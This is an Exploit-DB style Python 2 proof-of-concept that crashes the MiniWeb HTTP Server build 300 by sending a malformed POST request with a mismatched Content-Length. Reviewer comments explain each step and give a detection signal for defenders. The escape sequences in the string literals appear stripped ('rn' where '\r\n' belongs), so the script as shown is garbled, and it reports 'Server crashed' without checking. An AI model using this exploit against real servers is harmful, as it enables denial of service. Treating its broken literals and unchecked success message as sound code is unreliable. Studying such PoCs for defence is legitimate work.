
# Title : MiniWeb HTTP Server (build 300) - Crash PoC
# Published : 2013-05-13
# Author :


# MiniWeb HTTP server (build 300, built on Feb 28 2013) by Stanley Huang
# http://sourceforge.net/projects/miniweb/files/miniweb/0.8/miniweb-win32-20130309.zip/download
# Heap corruption PoC - remote DoS
# Tested on Win7 SP1 RUS
# (x) dmnt 2013

import socket

# Proof-of-concept: opens one TCP connection and sends a single hand-built
# POST request. Per the header comments, the affected software is MiniWeb
# build 300 and the reported effect is heap corruption that crashes the
# server (remote denial of service).
#
# Python 2 syntax: `print` is a statement and a `str` is passed to send().
#
# NOTE(review): several literals end in a bare 'n' or 'rn' (e.g. 'dmntn',
# where the header gives the author as "dmnt"). It looks like the backslashes
# of "\n" / "\r\n" were stripped when the page was extracted; confirm against
# the original advisory. As listed here, the request contains no CRLF line
# terminators at all.
print 'Mini Web HTTP Server remote DoS exploit by dmntn'
# Target is the loopback address, i.e. an instance running on the tester's
# own machine.
host = "127.0.0.1"
port = 8000
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print 'Connect to host and send payloadn'
# Request line: the path is "/" followed by a double-quote character, and the
# version token is 'HTTP/1.'.
stuff = 'POST /'+'"' +' HTTP/1.rn'
stuff+= 'Content-Type: application/x-www-form-urlencodedrn'
# The request declares Content-Length: 0 ...
stuff+= 'Content-Length: 0rnrn'
# ... but 15 'A' characters are appended after the headers, so the declared
# body length disagrees with the bytes actually sent.
# Defender view: a request whose declared length is zero yet carries trailing
# bytes, paired with an unusual request line, is a usable detection signal at
# a proxy or IDS; server-side, body handling should be bounded by a validated
# length. No fixed version is named on this page.
stuff+= 'A'*15
# The return value of send() is not checked, no response is read, and the
# socket is never closed explicitly.
s.send(stuff)
# Printed unconditionally: the script never checks whether the server is
# still responding, so this message is not evidence of a crash.
print 'Server crashedn'

# Exploit-DB note:
# Tinker with the amount of As to get this to work